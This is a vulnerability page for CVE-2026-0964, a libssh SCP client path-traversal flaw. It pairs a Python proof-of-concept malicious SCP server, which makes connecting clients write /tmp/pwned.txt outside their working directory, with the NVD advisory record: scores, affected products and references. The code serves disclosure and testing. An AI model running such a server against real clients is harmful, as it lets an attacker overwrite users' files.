CVE-2026-0964

import socket import threading # Simple PoC to simulate a malicious SCP server exploiting CVE-2026-0964 # It sends a malicious path to overwrite a file outside the working directory. def handle_client(client_socket): try: # Initial SCP protocol interaction (simplified) client_socket.send(b"\x00") # Sink stream # Send command to write to a file outside CWD (e.g., /tmp/pwned.txt) # C0644 indicates permissions and size, followed by the path malicious_path = b"/tmp/pwned.txt" command = b"C0644 10 " + malicious_path + b"\n" client_socket.send(command) # Send file content client_socket.send(b"VULNERABLE") # End of file client_socket.send(b"\x00") except Exception as e: print(f"Error: {e}") finally: client_socket.close() def start_server(host='0.0.0.0', port=22): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind((host, port)) server.listen(5) print(f"[+] Malicious SCP server listening on {port}...") while True: client, addr = server.accept() print(f"[+] Connection from {addr}") client_handler = threading.Thread(target=handle_client, args=(client,)) client_handler.start() if __name__ == "__main__": start_server()

{"cve": {"id": "CVE-2026-0964", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:00.393", "lastModified": "2026-05-19T14:16:32.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A malicious SCP server can send unexpected paths that could make the\nclient application override local files outside of working directory.\nThis could be misused to create malicious executable or configuration\nfiles and make the user execute them under specific consequences.\n\nThis is the same issue as in OpenSSH, tracked as CVE-2019-6111."}, {"lang": "es", "value": "Un servidor SCP malicioso puede enviar rutas inesperadas que podrían hacer que la aplicación cliente sobrescriba archivos locales fuera del directorio de trabajo. Esto podría ser mal utilizado para crear archivos ejecutables o de configuración maliciosos y hacer que el usuario los ejecute bajo consecuencias específicas.\n\nEste es el mismo problema que en OpenSSH, rastreado como CVE-2019-6111."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libssh:libssh:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.11.4", "matchCriteriaId": "68C64024-6979-46E1-A57F-5C0228DC8DAD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:*", "matchCriteriaId": "87DEB507-5B64-47D7-9A50-3B87FD1E571F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:18160", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:18683", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-0964", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/", "source": "[email protected]", "tags": ["Release Notes"]}]}}